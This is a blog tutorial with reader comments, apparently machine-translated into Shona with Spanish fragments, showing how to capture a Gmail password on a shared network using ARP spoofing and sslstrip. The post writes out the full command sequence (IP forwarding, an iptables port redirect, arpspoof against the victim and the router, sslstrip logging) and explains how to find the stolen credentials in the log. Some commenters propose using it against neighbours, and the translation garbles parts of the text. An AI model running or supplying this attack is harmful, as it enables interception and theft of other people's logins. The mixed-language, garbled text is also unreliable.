Mhoro maBloggi.
Kwemazuva ano ndine sampuro diki yekuti zvingave nengozi sei kuve nekubatana kune chero isina kuchengetedzwa network yeaya anodiwa nevazhinji vedu.
Kwemazuva ano, ndiri kuzoshandisa ArpSpoofing neSslstrip kuwana password yeGmail. Kuita kuti nharaunda iratidzike, ini ndakagadzira account inonzitestarp@gmail.com".
Uye sezvo ini ndisingade zvekutanga zvakanyanya, ngatidzikei kubhizinesi.
ZVAKAITIKA
Kune uyu muedzo izvo zvatiinazvo zvinotevera:
1. Anorwisa: Iyo desktop yangu kana komputa yedesktop ine Debian Wheezy. Kubva kuzvitoro iwe zvaunogona kuisa sslstrip y dsniff kuwana kuva harpspoofing
2. Akakuvadzwa: Iye akabatwa iri Android Hwendefa iyo inongoda chete kuona tsamba yake kuburikidza nebrowser.
3. Svikiro: Iyo yepakati ndeyangu Cisco DPC2425 Router
ADDRESSES.
Attacker kero: 172.26.0.2
Kero yeRouter: 172.26.0.1
Kero Yeakakuvara: 172.26.0.8
KURWISA:
Chinhu chekutanga chatichaitira kurwisa uku kuita kuti kumberi kuitike kuti komputa yedu ikwanise kuendesa ruzivo kune akabatwa iye asingazvione. (Zvikasadaro kunenge kuri kuramba kwevhisi kurwisa)
Nezve izvo isu zvatichashandisa:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo
Saka saka tinowana sei zvatinoda?
Ngatitangei kupinda tsamba yedu paThebhu Tichipinda mukati, tinoona kuti zviuru nezviuru zvezvinhu zvinoonekwa pane yedu console.
Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano
nano desdelinux
naControl + W isu tinotsvaga chimwe chinhu chinonzi CHINONYANYA KUTUMIRA
Uye isu tichaona chakadai.
Pakati peiyo tambo huru iyo isingaonekwe email yemunhu uye password.
Saka isu tinomhanya kurudyi kudzamara isu tazoona mwenje kumagumo kwetangi.
Pane imwe nguva tichaona kuti tingazvidzivirira sei zvishoma kubva pakurwiswa uku.
Reply with quote
Ini ndinotora uyu mukana kutaura kuti pakatumirwa posvo, mirairo yakanga isiri iyo.
Iwo iptables yekuraira kumagumo iri kushayikwa iyo 8080 iri pane mumwe mutsetse. Uye ipapo arpspoof mirairo yaive yese pamutsetse mumwe chete. Mutemo wega wega uri pane imwe tambo.
Ndinovimba mupepeti anozviona uye anogona kuzvigadzirisa.
Thanks.
Ini ndaita zvekugadzirisa zvawataura, ndizvo here?
Kana iwe uchizoisa kodhi mune yakasarudzika yekupinda, shandisa iyo HTML kuona, uye simbisa kuti chinyorwa chiri chokwadi usati watumira icho kuchakamirira. Ndatenda.
Zvinotyisa kuziva kuti avo vedu vasina ruzivo vari panjodzi dzakanyanya. Ruzivo rwakanaka kwazvo kunyangwe pandinonzwisisa zvishoma yenyaya ndinoona kukosha kwayo. Ndatenda!
Reply with quote
Asi izvo zvinongoshanda chete kana iye anorwisa uye akabatwa vari pane imwechete network. Chero zvazvingaitika, zvinoratidzika kwandiri kuti kana (uri pane imwechete network) ukabatanidza uchishandisa HTTPS izvo hazviitike nekuti iyo data yakavharidzirwa usati Wasiya muchina wako. Kana iwe ukabatanidza neHTTP (isina S) ini ndinofunga kuti kunyangwe kutarisa netambo tambo unoona makiyi.
Haisi chokwadi. Ndiri kubiridzira gmail password uye kana iwe ukaona gmail inoshandisa https. Saka? Iyo poindi ndeyekuti kunyangwe https yakachengeteka, zvinoenderana ne http. Saka haina kuchengetedzeka kudaro.
Usapupure zvakanyanya nezve https kuti iyo S haisi yeSuperman ndeye "safe"
inoshanda ne kana isina https, ndakayedza neine hunyanzvi linux distro uye inoshanda pasina matambudziko
Unogona kunyatsoishandisa kudzidzisa chidzidzo kune avo vanoba yako Wi-Fi. 😀
Izvo zvakati kana zvishoma senge izvo zvavakaudza nguva refu yapfuura pane Chema Alonso's blog:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, zvakanaka! / Uyezve ivo vanotaurira paranoid yangu pese pandinoshandisa iyo VPN pavanenge vachienda kunotarisa iyo bank account ...). Nenzira, iwe unofanirwa kuona kuti vanhu vanotsoropodza vari sei mumashoko ... kana pakupedzisira iri kuba ...
Iye zvino tinoda kutora dzidziso yekuti ungagadzira sei uye upe yako VPN sevhisi.
Iyo nyaya iyo iwe yaunobatanidza inonakidza kwazvo, inoita kunge inokodzera bhuku reruzivo, uye izvi zvinoita kuti ndirangarire pandakashandisa internet yevavakidzani vangu uye kunyangwe ndichiti ndinoziva nyaya iyi, ndinofunga kuti ndaisatomboona iwo madimikira echokwadi e njodzi yandaigona kuve nayo yekupedzisira, nerombo rakanaka kwandiri, ivo vakango chinja password kuita WPA2 uye ndipo pakatangira nyaya yangu neIP
Ndosaka zita racho richiti Sslstrip muchiito.
Inoshanda, chero bedzi uyo anorwisa ari pakati
Ndeipi wave iwe yaunoshanda pane prism? -.-
aihwa.
Chii chauri kumirira kutumira chako chikumbiro XD
Kwazisa
post yakanaka
Zvinonakidza, ndichaita bvunzo yekudzidzisa gare gare ... Pamwe ndinogona kubvisa password kuWiFi ndombofara kwechinguva 😛
Nemukana chero upi zvawo, unogona here kuita chimwe chinhu chakafanana kutumira mapeji akasiyana kune iwo akanangwa? Semuenzaniso, ivo vanoda kuvhura Facebook uye ini ndinovaendesa kuGoogle? 😛
Ehe. Asi iwo ese akasiyana roll.
Pamwe ndozotumira gare gare.
yakanaka kwazvo posvo, idzi misoro inodzidzisa kwazvo, ikozvino isu tinofanirwa kukwanisa kupokana nekurwiswa uku, sezvo vamwe (seni) vanobatana neruzhinji network (yunivhesiti semuenzaniso) zvingave zvinobatsira kuzvidzivirira.
Ndinokutendai!
Izvo hazvina kundishandira 🙁
Chimwe chinhu chinonditadzisa pano, kunze kwekuti iyo https yekubatanidza yakavharidzirwa kuburikidza neserver chitupa (kana uchinge uine chitupa pamushini wako, bhurawuza rako riri pamusoro peiyo encryption) ine iptables iwe unonangidzira chiteshi 80 (http), kwete 443 inova https
Ndakafunga saizvozvo. Iyo poindi ndeyekuti kunyangwe https iri "yakachengeteka" zvinosuruvarisa zvinoenderana ne http. Saka sslstrip inotora mukana weizvozvo, zvinoita kuti bhurawuza itende kuti iri kushandisa zvitupa zve https asi haisi.
utsvene! asi bhurawuza rinofanira kuona yambiro yakadai sekuti "ichi chitupa chinouya kubva kune inofungidzirwa saiti kana chimwe chakadai" ... ndichafanirwa kuita bvunzo XD
Kwete, zvachose hapana chinobuda.
Yakazo shandira ini
Ini ndakabatana pane WEP network ine password, uye yakandiratidza iyo password zvakananga zvakadaro.
Mubvunzo. Iwe unogona here kuita izvi zvakafanana maitiro asi kune ese makomputa akasunganidzwa mune network, panzvimbo yekuve nemunhu mumwe akabatwa?
Hongu unokwanisa. Asi ini handina kumboedza. Edza iwe pachako uye utiudze kuti uri sei.
Chinhu chega chandinowana neichi ndechekuti muchina wemunhu akabirwa hausi kubuda, asi iyo sslstrip haina kundiratidza chero chinhu: /
Iwe unofanirwa kudzima firewall kwechinguva. Kana zvirinani inogonesa inouya kubatana.
Ini naProbe taingoona chete zita rekushandisa uye password yeiyo facebook peji, mune gmail ini handina kuwana mhedzisiro murogi, zvakare ini ndaingoda arpspoof mutsetse «arpspoof -i -t«. Kune rimwe divi, muchina wekubiwa haukwanise kuvhura mamwe mapeji. Ini ndicharamba ndichiongorora, zvinonakidza kwazvo. Rubatsiro kune avo vanoshandisa Manjaro, mapakeji ekuisa ndeaya: dsniff (heino arpspoff), yakakombama uye python2-pyopenssl. Sslstrip inogona kutorwa pasi kubva apa: http://www.thoughtcrime.org/software/sslstrip/
Kuti umhanye iyo $ python2 sslstrip.py
Thanks.
Haina kubuda asi arpspoof mutsetse ndewe: #arpspoof -i int -t ip-victim ip-router
tarisa ndinoita chaizvo zvaunotaura:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A KUFANANA -p tcp -kugadza-chiteshi-80 -j REDIRECT -kuenda-kuzviteshi 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
Dambudziko nderekuti nyajambwa, ndiani imwe pc yandinayo muno mumba mangu, akasara asina kubatana kusvika pakuti ndinofanira kutangazve router, chii chandingaite, ndibatsireiwo.
Chimwe chinhu, ini ndiri kushanda nemuchina chaiwo, uye kana ndichiita iyo iwconfig yekuraira, wlan0 haioneke, kana kana ndichiita ifconfig, zvisinei kana ndine internet pamushini wangu chaiwo chii chine eth0 interface.